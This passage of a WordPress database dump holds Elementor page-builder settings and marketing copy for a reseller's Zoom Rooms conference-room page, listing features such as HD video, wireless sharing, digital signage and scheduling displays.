\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"406125c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Centralized management<\\/h4><p class=\\\"mt-1 mb-5\\\">Get the overview status and management of deployed conference rooms in a single admin console<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0518cb7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"92a3de4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c7f20ea\",\"elType\":\"widget\",\"settings\":{\"title\":\"Zoom Rooms includes the following value-added services at no additional cost.\",\"header_size\":\"h3\",\"align\":\"center\",\"title_color\":\"#000000\",\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0e401c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"428f120\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a4857de\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Digital Signage<\\/h3><p>Digital Signage gives organizations the power to manage corporate communications, internal marketing, and more across multiple offices and departments from the Zoom Admin Portal.<\\/p><ul><li>Leverage room displays when not in use<\\/li><li>Manage displays at scale or individually<\\/li><li>Unlimited amount of displays supported (both in and out of conference rooms)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b6e2b30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8217db2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Scheduling Display<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">End scheduling headaches with a beautiful display that provides room availability information and capabilities to book a meeting for any available time of that day.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e1221c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cf0ae88\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Make interactive collaboration easy with touch screens<\\/h3><p>Power up your team with Zoom meetings on collaborative touch screens featuring screen sharing, white boarding, and co-annotation\\u00a0 all at the tip of your fingers.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d2912a1\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/gezS90Pg_fk\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d565e7b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c28793b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"29d7347\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"1\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6173,3052,'_wp_page_template','template-fullwidth.php'),(6174,3052,'_elementor_edit_mode','builder'),(6175,3052,'_elementor_template_type','post'),(6176,3052,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(6177,3052,'_elementor_data','[{\"id\":\"cad15a9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5c7499\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"96a0357\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Zoom for the Conference Room<\\/h2><h3>Software-based, flawless video, integrated audio, and wireless content sharing<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66635b2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1e75488\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5affd82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Simple, flexible set up<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">Build the room you need with the hardware you want on top on Zoom\\u2019s cloud-based platform.<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d999cea\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6757f8b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Modern capabilities<\\/h3><p>Deploy scalable conferencing solutions that help you address the problems of today and opportunities of tomorrow.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2b51dbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ff854f8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Happy, productive users<\\/h3><p>We focus on delivering compelling, easy-to-use technology, so that you and your teams can focus on the task at hand.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"faaa0fe\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/Zoom-Conference-Room-Solutions_page2_image7.jpg\",\"id\":3048},\"background_position\":\"center center\",\"background_attachment\":\"scroll\",\"background_size\":\"cover\"},\"elements\":[{\"id\":\"886f41b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"a8a224a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">HD video and audio<\\/h4><p class=\\\"mt-1 mb-5\\\">Bring high quality video, audio, and web conferencing to your existing rooms.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"412feda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Wireless sharing<\\/h4><p class=\\\"mt-1 mb-5\\\">Cut the cords, cables, and dongles -- present content wirelessly from your laptop or mobile device.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3d2b744\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Interoperability with any video system<\\/h4><p class=\\\"mt-1 mb-5\\\">Communicate with existing SIP or H.323 systems<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a34735d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"isInner\":false},{\"id\":\"ab89310\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"fcc54ee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">Meet with anyone<\\/h4><p class=\\\"mt-1 mb-5\\\">Include remote participants on desktop, mobile, or other conference room systems.<\\/p>\",\"text_color\":\"#000000\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3c1657b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 class=\\\"mb-1 mt-0\\\">One touch to start meetings<\\/h4><p class=\\\"mt-1 mb-5\\\">Leveraging native integrations with Cisco and Polycom, bring one-touch to start a meeting through your calendaring 